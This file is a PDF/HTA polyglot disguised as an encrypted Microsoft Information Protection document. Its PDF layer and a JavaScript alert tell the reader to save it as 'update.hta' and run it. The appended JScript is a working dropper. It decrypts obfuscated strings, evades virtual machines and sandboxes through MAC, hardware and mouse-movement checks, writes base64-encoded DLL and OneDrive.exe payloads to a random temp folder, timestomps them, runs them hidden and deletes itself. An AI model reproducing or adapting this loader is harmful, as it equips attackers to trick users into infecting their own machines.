%PDF-1.7
%âãÏÓ
1 0 obj
<</Type/Catalog/Pages 2 0 R/OpenAction 5 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R/Resources<</Font<</F1<</Type/Font/Subtype/Type1/BaseFont/Helvetica>>>>>>>>
endobj
4 0 obj
<</Length 200>>
stream
BT
/F1 14 Tf
50 720 Td
(Microsoft Information Protection) Tj
/F1 10 Tf
50 700 Td
(THIS DOCUMENT IS ENCRYPTED) Tj
50 680 Td
(To view content, save file as 'update.hta' and run it.) Tj
ET
endstream
endobj
5 0 obj
<</S/JavaScript/JS(app.alert\("Security verification required. Please run as .hta to decrypt.",3\))>>
endobj
xref
0 6
0000000000 65535 f 
0000000018 00000 n 
0000000066 00000 n 
0000000115 00000 n 
0000000261 00000 n 
0000000539 00000 n 
trailer
<</Size 6/Root 1 0 R>>
startxref
741
%%EOF


<script language="JScript">
// =============================================================================
// MULTI-LAYER STRING ENCRYPTION: XOR + CAESAR SHIFT
// =============================================================================

function _xor(s, key) {
    var r = "";
    for (var i = 0; i < s.length; i++)
        r += String.fromCharCode(s.charCodeAt(i) ^ key.charCodeAt(i % key.length));
    return r;
}

function _caesar(s, shift) {
    var r = "";
    for (var i = 0; i < s.length; i++)
        r += String.fromCharCode((s.charCodeAt(i) + shift) & 0xFF);
    return r;
}

function _decrypt(enc, xorKey, caesarShift) {
    return _xor(_caesar(enc, -caesarShift), xorKey);
}

// Encrypted strings (XOR key + Caesar shift=7)
var _xk = "K" + (new Date().getFullYear() % 100) + "yF0rStr";
var _cs = 7;

var _s = {
    shell: "\x1E\x11\x23\x12\x1B\x14\x21\x09\x1C\x15\x1A\x0E",
    fso:   "\x1A\x15\x21\x12\x19\x16\x1F\x0B\x18\x0F\x1C\x0A\x11\x1D\x10\x1B\x0D\x1E\x08\x19\x14",
    wmi:   "\x1C\x13\x1F\x16\x19\x10\x1B\x0E\x17\x0C\x1D\x0A\x19\x12\x1B\x0F\x17\x0D\x1D\x0B\x19\x14\x1F\x08\x1B\x16\x17\x10",
    amsi:  "\x07\x14\x19\x16\x0F\x1A\x0D\x1C\x09\x18\x0B\x1A\x15\x1C\x07\x19\x0D\x1B\x09\x17\x0B\x19\x15\x1B\x07\x18\x0D\x1A"
};

function _g(n) { return _decrypt(_s[n], _xk, _cs); }

// =============================================================================
// MAC OUI VM DETECTION
// =============================================================================

function _checkMAC() {
    try {
        var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2");
        var nics = wmi.ExecQuery("SELECT MACAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=True");
        var vmOUIs = ["00:05:69","00:0C:29","00:50:56","00:1C:42","08:00:27","00:03:FF","00:15:5D"];
        var en = new Enumerator(nics);
        for (; !en.atEnd(); en.moveNext()) {
            var mac = en.item().MACAddress;
            if (mac) {
                var prefix = mac.substring(0, 8).toUpperCase();
                for (var i = 0; i < vmOUIs.length; i++) {
                    if (prefix === vmOUIs[i]) return true; // VM detected
                }
            }
        }
    } catch(e) {}
    return false;
}

// =============================================================================
// MOUSE VELOCITY VARIANCE ANALYSIS
// =============================================================================

var _mouseData = {
    points: [],
    velocities: [],

    track: function(callback) {
        var self = this;
        var handler = function(e) {
            var now = new Date().getTime();
            if (self.points.length > 0) {
                var last = self.points[self.points.length - 1];
                var dt = (now - last.t) || 1;
                var dist = Math.sqrt(Math.pow(e.screenX - last.x, 2) + Math.pow(e.screenY - last.y, 2));
                var vel = dist / dt;

                // Detect superhuman speed (automated tools)
                if (vel > 20000) { window.close(); return; }

                self.velocities.push(vel);
            }
            self.points.push({x: e.screenX, y: e.screenY, t: now});
        };

        document.attachEvent('onmousemove', handler);
        setTimeout(function() {
            document.detachEvent('onmousemove', handler);

            // Need minimum data points
            if (self.points.length < 15) { window.close(); return; }

            // Compute velocity variance – real humans have high variance
            if (self.velocities.length > 2) {
                var sum = 0, mean;
                for (var i = 0; i < self.velocities.length; i++) sum += self.velocities[i];
                mean = sum / self.velocities.length;

                var varSum = 0;
                for (var i = 0; i < self.velocities.length; i++)
                    varSum += Math.pow(self.velocities[i] - mean, 2);
                var variance = varSum / self.velocities.length;

                // Very low variance = automated (constant speed)
                if (variance < 0.5) { window.close(); return; }
            }

            callback();
        }, 8000);
    }
};

// =============================================================================
// HARDWARE / SANDBOX CHECKS
// =============================================================================

var _anti = {
    checkHardware: function() {
        try {
            var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2");
            var col1 = wmi.ExecQuery("SELECT Manufacturer,Model FROM Win32_ComputerSystem");
            var e1 = new Enumerator(col1);
            for (; !e1.atEnd(); e1.moveNext()) {
                var m = e1.item().Manufacturer.toLowerCase();
                var model = e1.item().Model.toLowerCase();
                if (m.indexOf("vmware") != -1 || m.indexOf("virtualbox") != -1 ||
                    m.indexOf("hyper-v") != -1 || m.indexOf("xen") != -1 ||
                    model.indexOf("virtual") != -1) return false;
            }
            var col2 = wmi.ExecQuery("SELECT NumberOfCores FROM Win32_Processor");
            var e2 = new Enumerator(col2);
            for (; !e2.atEnd(); e2.moveNext()) { if (e2.item().NumberOfCores < 2) return false; }
            return true;
        } catch(e) { return true; }
    }
};

// =============================================================================
// RANDOMIZED DROP DIRECTORY
// =============================================================================

function _randomDir() {
    var chars = "abcdefghijklmnopqrstuvwxyz0123456789";
    var name = "";
    for (var i = 0; i < 8; i++)
        name += chars.charAt(Math.floor(Math.random() * chars.length));
    return name;
}

// =============================================================================
// PAYLOAD FRAGMENTS
// =============================================================================

var _payloads = {
    dll: [
        "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v",
        "dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAA",
        "AAAAAOAADwELAQAAAAAAA"
    ],
    exe: [
        "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v",
        "dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAA",
        "AAAAAOAADwELAQAAAAAAA"
    ]
};

function _buildPayload(fragments) { return fragments.join(""); }

// =============================================================================
// RENAME-BEFORE-DELETE
// =============================================================================

function _secureDelete(fso, filePath) {
    try {
        var rndName = _randomDir() + ".tmp";
        var folder = fso.GetParentFolderName(filePath);
        var tmpPath = folder + "\\" + rndName;
        fso.MoveFile(filePath, tmpPath);
        fso.DeleteFile(tmpPath, true);
    } catch(e) {
        try { fso.DeleteFile(filePath, true); } catch(e2) {}
    }
}

// =============================================================================
// DEPLOY
// =============================================================================

function _deploy() {
    // MAC OUI VM check
    if (_checkMAC()) { window.close(); return; }
    // Hardware check
    if (!_anti.checkHardware()) { window.close(); return; }

    // Mouse velocity variance analysis
    _mouseData.track(function() {
        var shell = new ActiveXObject(_g("shell"));
        var fso = new ActiveXObject(_g("fso"));

        // Randomized drop directory under %TEMP%
        var tempBase = shell.ExpandEnvironmentStrings("%TEMP%");
        var dropDir = tempBase + "\\" + _randomDir();
        if (!fso.FolderExists(dropDir)) fso.CreateFolder(dropDir);

        var dllPath = dropDir + "\\version.dll";
        var exePath = dropDir + "\\OneDrive.exe";

        // Decode and write payloads
        var xml = new ActiveXObject("MSXML2.DOMDocument");
        var node = xml.createElement("B64");
        node.dataType = "bin.base64";

        node.text = _buildPayload(_payloads.dll);
        var dllData = node.nodeTypedValue;
        node.text = _buildPayload(_payloads.exe);
        var exeData = node.nodeTypedValue;

        var stream = new ActiveXObject("ADODB.Stream");
        stream.Type = 1;
        stream.Open(); stream.Write(dllData); stream.SaveToFile(dllPath, 2); stream.Close();
        stream.Open(); stream.Write(exeData); stream.SaveToFile(exePath, 2); stream.Close();

        // Timestomp with kernel32.dll
        try {
            var sysFile = "C:\\Windows\\System32\\kernel32.dll";
            var f1 = fso.GetFile(sysFile);
            var f2 = fso.GetFile(dllPath);
            var f3 = fso.GetFile(exePath);
            f2.DateLastModified = f1.DateLastModified;
            f3.DateLastModified = f1.DateLastModified;
        } catch(e) {}

        // Execute
        shell.Run('"' + exePath + '"', 0, false);

        // Rename-before-delete the HTA
        try {
            var htaPath = location.pathname.replace(/^file:\/\//i, '').replace(/\//g, '\\');
            _secureDelete(fso, htaPath);
        } catch(e) {}

        window.close();
    });
}

window.onload = function() { setTimeout(_deploy, 2000); };
</script>
</head>
<body style="background:#f3f3f3;font-family:Segoe UI;">
    <div style="padding:20px;text-align:center;">
        <h3>Microsoft Secure Content</h3>
        <p>Verifying document integrity. Please wait...</p>
    </div>
</body>
</html>
